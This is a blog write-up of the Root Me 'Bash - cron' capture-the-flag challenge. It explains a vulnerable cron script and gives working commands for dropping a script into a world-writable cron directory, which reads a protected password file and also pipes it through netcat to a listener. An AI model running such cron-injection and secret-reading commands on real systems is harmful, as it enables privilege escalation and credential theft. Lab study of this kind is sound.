A good choice to start learning is
Root Me allows us to practice with a lot of challenges, classified in arguments: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.
Let's start with the first category: App - Script.
The fifth challenge that we face is: Bash - cron:
Vulnerability type:
- Privilege Escalation by exploiting CRON jobs
##################################################
At the beginning, open terminal and type:
- ssh -p 2222 app-script-ch4@challenge02.root-me.org
to connect to the target system. If it asks for a password, insert app-script-ch4.
If we type ls -la command, we will see two files: ch4 and cron.d. cron.d is a symbolic link to /tmp/._cron folder.
It's clear that this challenge is focused on cron jobs: Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. The list of cron jobs are shown by executing crontab -l. The programs shown on crontab -l will be executed as owner's program privileges.
It's clear that this challenge is focused on cron jobs: Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. The list of cron jobs are shown by executing crontab -l. The programs shown on crontab -l will be executed as owner's program privileges.
For first, let's analyze the ch4 script file:
#!/bin/bash
# Sortie de la commande 'crontab -l' exécutée en tant que app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# Vous N'avez PAS à modifier la crontab(chattr +i t'façons)
# Output of the command 'crontab -l' run as app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# You do NOT need to edit the crontab (it's chattr +i anyway)
# hiding stdout/stderr
exec 1>/dev/null 2>&1
wdir="cron.d/"
challdir=${0%/*}
cd "$challdir"
if [ ! -e "/tmp/._cron" ]; then
mkdir -m 733 "/tmp/._cron"
fi
ls -1a "${wdir}" | while read task; do
if [ -f "${wdir}${task}" -a -x "${wdir}${task}" ]; then
timelimit -q -s9 -S9 -t 5 bash -p "${PWD}/${wdir}${task}"
fi
rm -f "${PWD}/${wdir}${task}"
done
rm -rf cron.d/*# Output of the command 'crontab -l' run as app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# You do NOT need to edit the crontab (it's chattr +i anyway)
It means that the crontab shows that ch4 is a cronjob that is executed each 1 minute. How does ch4 work?
Looking the code, ch4 hides stdout and stderr so I cannot hope to receive any result to screen. Then, on the last part of code, it reads each file (that it calls task) inside /tmp/._cron (by referring to cron.d symbolic link) and execute it. More precisely, the ch4 code executes each file inside /tmp/._cron/ only if the file is a regular file (-f option), if it exists (-a option) and if it is executable (-x option).
Then it executes bash -p "${PWD}/${wdir}${task}" where -p allows us to execute the file inside /tmp/._cron preserving user permissions. Otherwise bash will set its uid to
the invoked user’s uid.
At the end, ch4 deletes the file and all the files inside cron.d (so inside /tmp/._cron/).
All these aspects make us to understand that we need to create a script inside /tmp/._cron/. As said before, we cannot have screen output because of ch4 code, so we must redirect the command inside our script to external file that we need to save inside a folder where we have all permissions, i.e. /tmp/ folder. Our script could be:
#!/bin/bash
/bin/cat /challenge/app-script/ch4/.passwd > /tmp/solution; /bin/chmod 777 /tmp/solution
and give all permissions to the script file:
- chmod 777 /tmp/._cron/script
- echo '#!/bin/sh' > /tmp/._cron/script; echo '/bin/cat /challenge/app-script/ch4/.passwd > /tmp/solution ; /bin/chmod 777 /tmp/solution' >> /tmp/._cron/script ; chmod 777 /tmp/._cron/script
At the end, type cat /tmp/solution and the solution will be shown.
Useful links:
############################################
Another solution (from rootme website) is using netcat:
Use screen:
- screen -R ch4
and run the listener:
- nc -lvp 8090
port number needs to be > 1024 because of permissions.
While you are on the Screen, type
- <Ctrl>+a:
- d
to detach from screen.
Create a file inside /tmp/._cron that contains the following:
#!/bin/sh
cat /challenge/app-script/ch4/.passwd | nc localhost 8090
and give all permissions to the script otherwise we don't get anything:
- chmod 777 /tmp/._cron/script
Wait 1 minute for execution and find the code in netcat.
If screen was used, reattach:
- screen -R ch4
Nessun commento:
Posta un commento